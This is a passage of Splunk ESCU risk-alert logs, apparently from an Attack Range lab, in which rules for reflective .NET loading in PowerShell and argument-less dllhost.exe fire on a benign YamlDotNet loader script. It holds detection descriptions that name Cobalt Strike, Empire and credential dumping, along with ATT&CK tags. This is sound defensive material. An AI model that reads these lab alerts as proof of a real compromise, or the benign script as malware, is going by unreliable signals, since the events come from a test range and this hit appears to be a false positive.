Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664697331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T06:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T06:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664697331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T06:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T06:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664690400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664690400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2884", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664690400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664690400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xb44", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664693732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664693732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664693732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664693732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law 